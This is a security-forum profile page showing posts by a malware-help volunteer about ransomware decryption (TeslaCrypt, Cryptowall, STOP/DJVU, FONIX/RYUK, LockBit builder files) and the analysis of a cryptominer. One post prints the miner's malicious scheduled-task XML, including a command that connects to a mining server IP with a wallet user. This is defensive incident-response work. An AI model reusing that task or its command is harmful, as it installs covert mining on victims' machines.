-
Posts
111 -
Joined
-
Days Won
1
safety last won the day on July 9 2023
safety had the most liked content!
About safety
-
Rank
Newbie
Profile Information
-
Gender
Male
-
Location
Russia
-
Interests
forum.esetnod32.ru
Recent Profile Visitors
1,298 profile views
-
Nightowl reacted to a post in a topic: I got ransomware attacked in 2016, I have the files, how to decrypt them?
-
itman reacted to a post in a topic: I got ransomware attacked in 2016, I have the files, how to decrypt them?
-
I think the decryption of your mp3 files was correct using esetteslacryptdecryptor.exe, but there is also a second layer of encryption, and this, unfortunately, is Cryptowall 3. Judging by the first 16 bytes at the beginning of each file after decryption. (The first 16 bytes are the same for all files) 723800F3740E5CF011BDB7F6EE44EC63
-
Judging by the README.txt file from TeslaDecoder TeslaCrypt 3.0.0 - 3.0.1 (.xxx, .ttt., .micro), 4.0+ (as original) *.mp3 also applies to TeslaCrypt v3 version It would be a good idea on your part to provide several encrypted mp3 files + logs from the esetteslacryptdecryptor.exe program to see what result is obtained after the decryption process is completed. For example: It was possible that there was double encryption of 3.0 and 4.0 in some order, and the decryptor had to be run twice to decrypt each of the encryption layers. If the first layer of encryption was Cryptowall 3.0, then it will not be possible to completely decrypt the file. But all this needs to be checked after you provide the necessary files (preferably 3-4)
-
safety changed their profile photo
-
Nightowl reacted to a post in a topic: Pc infected with cyberfear@decryptor, SEXAXGLSY files
-
Pc infected with cyberfear@decryptor, SEXAXGLSY files
safety replied to marc1200's topic in Malware Finding and Cleaning
1.5 years after the leak, the builder began to work smarter, but at first the folder with the builder files remained on the disk. Some of the attackers do not change the private key for a long time (decrutor), and after redeeming the key there is a chance to help other victims. >>>> Your personal DECRYPTION ID: 0D4726C60545E66F7A63330CE76CDAF9 >>>> Your personal DECRYPTION ID: 0D4726C60545E66F4343434343434343 >>>> Your personal DECRYPTION ID: 0D4726C60545E66FEFE02D17117DDA22 >>>> Your personal DECRYPTION ID: 0D4726C60545E66F7A63330CE76CDAF9 -
Pc infected with cyberfear@decryptor, SEXAXGLSY files
safety replied to marc1200's topic in Malware Finding and Cleaning
If the builder was launched on the victim’s device, you need to look for these files on the disk, possibly among deleted files. As a result, all the necessary tools for encryption and decryption are automatically created in the *\Build folder. DECRYPTION_ID.txt LB3.exe LB3Decryptor.exe LB3_pass.exe LB3_ReflectiveDll_DllMain.dll LB3_Rundll32.dll LB3_Rundll32_pass.dll Password_dll.txt Password_exe.txt priv.key pub.key here the LB3.exe file is enough for encryption, and LB3Decryptor.exe or priv.key for decryption -
Dear Colleagues! Is it possible to decrypt a *.dat file paired with mobsync.dll/evntagnt.dll? Presumably this file may contain a config for the task, with the help of which the miner is launched from a folder with an arbitrary name For example: RescueSwift-fc4b811c-e35f-4a8d-a903-db85344b9d7f PicturePerfect-d2f4adbc-5e35-42fd-bfe5-bbdf187ada08 ExpressEditor-22b9dab3-7036-45b3-9fda-b264e8491726 BoltDownloader-e1648eb4-dcd2-4e6d-b19a-7fc96278e3b5 and others. The miner launch chain looks like this: (filmed via Universal Virus Sniffer) Полное имя C:\WINDOWS\SYSWOW64\SVCHOST.EXE Имя файла SVCHOST.EXE Тек. статус АКТИВНЫЙ ПРОВЕРЕННЫЙ сервис в автозапуске Фильтр Удовлетворяет критериям THREADS IN PROCESSES (ПРЕДУПРЕЖДЕНИЕ ~ ОБНАРУЖЕН ВНЕДРЕННЫЙ ПОТОК В ПРОЦЕССЕ)(1) [filtered (0)] Сохраненная информация на момент создания образа Статус АКТИВНЫЙ ПРОВЕРЕННЫЙ сервис в автозапуске Процесс 32-х битный File_Id 768582FAD000 Linker 14.20 Размер 46544 байт Создан 27.11.2023 в 13:19:16 Изменен 27.11.2023 в 13:19:16 TimeStamp 04.01.2033 в 14:21:46 EntryPoint + OS Version 10.0 Subsystem Windows graphical user interface (GUI) subsystem IMAGE_FILE_DLL - IMAGE_FILE_EXECUTABLE_IMAGE + Тип файла 32-х битный ИСПОЛНЯЕМЫЙ Цифр. подпись Действительна, подписано Microsoft Windows Publisher Оригинальное имя svchost.exe.mui Версия файла 10.0.19041.1 (WinBuild.160101.0800) Описание Хост-процесс для служб Windows Производитель Microsoft Corporation Доп. информация на момент обновления списка pid = 4092 NT AUTHORITY\СИСТЕМА CmdLine C:\Windows\SysWOW64\svchost.exe -k DcomLaunch -s EvntAgntSvc_daa0aa Процесс создан 13:01:43 [2023.12.03] С момента создания 00:01:21 CPU 0,09% CPU (1 core) 1,10% parentid = 948 C:\WINDOWS\SYSTEM32\SERVICES.EXE Предупреждение (!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSWOW64\SVCHOST.EXE [4092], tid=5376 Создание задачи \Task-b4045877-4506-4217-974f-7ca9dc3da345_Vl pid = 4092 NT AUTHORITY\СИСТЕМА TaskXML <?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="hxxp://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <URI>\Task-b4045877-4506-4217-974f-7ca9dc3da345_Vl</URI> </RegistrationInfo> <Triggers> <RegistrationTrigger id="Trigger1"> <EndBoundary>2023-12-03T13:02:54</EndBoundary> <Enabled>true</Enabled> <Delay>PT25S</Delay> </RegistrationTrigger> </Triggers> <Principals> <Principal id="Author"> <UserId>S-1-5-21-3326377353-2303841640-77764357-1003</UserId> <RunLevel>HighestAvailable</RunLevel> <LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <Duration>PT10M</Duration> <WaitTimeout>PT1H</WaitTimeout> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>C:\ProgramData\TileDataNetwork-ba00c230-6183-4f3e-944f-35140b43215a\TileDataNetwork.exe</Command> <Arguments>--create --algo 144_5 --pers BgoldPoW -i 99 --server 185.180.230.136:8080 --user ARRLXmqTUQrpjcN7P7xnnx1K1gfHQbCTiJ.Zephyr -w 0</Arguments> </Exec> </Actions> </Task> Время 13:01:49 [2023.12.03] parentid = 948 C:\WINDOWS\SYSTEM32\SERVICES.EXE SHA1 53C010F3CC328D4764359DA02D209750E4616BB4 MD5 BBFF42F3C7E8FC0E3049F6F88FBB88E2 Ссылки на объект Ссылка HKLM\System\CurrentControlSet\Services\EvntAgntSvc_daa0aa\ImagePath ImagePath %SystemRoot%\SysWOW64\svchost.exe -k DcomLaunch DisplayName EvntAgnt_999b80 Description Event Translator SNMP subagent EvntAgntSvc_daa0aa тип запуска: Авто (2) Изменен 27.11.2023 в 12:21:35 Образы EXE и DLL SVCHOST.EXE C:\WINDOWS\SYSWOW64 Загруженные DLL НЕИЗВЕСТНЫЕ EVNTAGNT.DLL C:\WINDOWS\SYSWOW64 -------------------- Here is the task TaskXML <?xml version="1.0" encoding="UTF-16"?> created after service starts C:\Windows\SysWOW64\svchost.exe -k DcomLaunch -s EvntAgntSvc_daa0aa Presumably, this is the task that is extracted from the *.dat file After creating the task, the miner is launched from the preinstalled folder, in this case from C:\ProgramData\TileDataNetwork-ba00c230-6183-4f3e-944f-35140b43215a execution block: <Exec> <Command>C:\ProgramData\TileDataNetwork-ba00c230-6183-4f3e-944f-35140b43215a\TileDataNetwork.exe</Command> <Arguments>--create --algo 144_5 --pers BgoldPoW -i 99 --server 185.180.230.136:8080 --user ARRLXmqTUQrpjcN7P7xnnx1K1gfHQbCTiJ.Zephyr -w 0</Arguments> </Exec> There are three different pairs in the archives, collected from different cases. archive password - "infected" (without quotes) Samples.rar
-
safety reacted to a post in a topic: Customer satisfaction survey 2023
-
With a high probability, this was a STOP (DJVU) ransomware ransomware attack. If the files on your device did not change the extension to *.miqe, then the attack was successfully repulsed. Most likely, ESET reacted to the ransom note. Time;Scan Engine;Object Type;Object;Detection;Action;User;Info;Hash;First Detection Here 2023/07/26 15:08:15;Real-time file system protection;file;E:\files\_readme.txt;MSIL/Filecoder.ANG trojan;removed;**\safety;Event occurred in a file modified by an application : C:\Program Files (x86)\Total Commander\TOTALCMD64.EXE (05BF026F5834567EEF2711B0E9F980E36C9C8C13).;6FFE53DAFEA78BF7D01D23B2B5F75B226AB84797;12.06.2023 20: 09:37
-
itman reacted to a post in a topic: Eset VS Miner
-
In general, the topic with this miner ("REALTEKD / TASKHOSTW") on technical forums in Russia and apparently in Ukraine over the past few years in popularity can only be compared with the Stop Djvu encryptor (but there at least the file extension changes stably, but here there is practically nothing does not change). Many antiviruses are taken out and blocked, not only ESET. In both cases, the infection occurs as a result of the use of hacked programs. The installer with this miner, as a rule, is several Gb, and there is no way to check it for viruses. In addition to blocking the launch of installers and utilities, blocking standard installation paths for anti-virus programs, access to the sites of technical forums and anti-virus companies is also blocked.
-
safety reacted to a post in a topic: Detecting of malicious scripts *.py in the .unitypackage files
-
safety reacted to a post in a topic: Detecting of malicious scripts *.py in the .unitypackage files
-
Dear colleagues, is it possible In ESET products to detect malicious scripts *.py in the .unitypackage files (a compressed package created by Unity-a 3D-game development program contains access to the project and library files used to build a game)? To create scripts, for example, Hawkish-Grabber builder can be used, then the script can be added to the .unitypackage file and when the Unity application is opened automatically when opening this file.
-
Nightowl reacted to a post in a topic: Is it possible to decrypt files for modified FONIX/RYUK?
-
Nightowl reacted to a post in a topic: Is it possible to decrypt files for modified FONIX/RYUK?
-
Is it possible to decrypt files for modified FONIX/RYUK?
safety replied to safety's topic in Malware Finding and Cleaning
Reinstalling the system may affect the investigation of the incident, but in order to analyze "whether or not decryption of files is possible", the user transferred everything that was needed: encrypted files, the body of the encryptor, a ransom note, additional files, from which it was previously possible to restore the key. DrWeb requirements are quite strict: free decryption is possible if the user has a license for the DrWeb product, if the product has been installed, updated and skipped the encryptor file. Nothing is known about the presence of FONIX decryption in DrWeb, Bitdef used cpriv.key (i.e. key file) previously, Gillespie (Emsisoft) also wrote about the need for a key file to decrypt FONIX, Avast uses a key file (cpriv.key, hrmlog1 ) to restore the session private key and then decrypt the files, Kaspersky receives the session key and adds it to the Rakhni public decryptor. -
Is it possible to decrypt files for modified FONIX/RYUK?
safety replied to safety's topic in Malware Finding and Cleaning
This user is not under sanctions: WebClientComputerName, *.almaty.*.kz LicensePartnerCountry, KZ -------- I don't think it would be convenient to say in this thread why Kaspersky is stronger than DrWeb or vice versa. -
Is it possible to decrypt files for modified FONIX/RYUK?
safety replied to safety's topic in Malware Finding and Cleaning
This is a fresh wave of FONIX, somewhere from the beginning of June. The previous wave was in January-March of this year. Most likely hacked by RDP The antivirus was installed after encryption. -
Is it possible to decrypt files for modified FONIX/RYUK?
safety replied to safety's topic in Malware Finding and Cleaning
@itman, The key file cpriv.key was in Fonix/XINOF variants, for Fonix/RYUK this file is called hrmlog1. Unfortunately, according to the current version of FONIX / RYK, the previous known decoders do not work. Alas.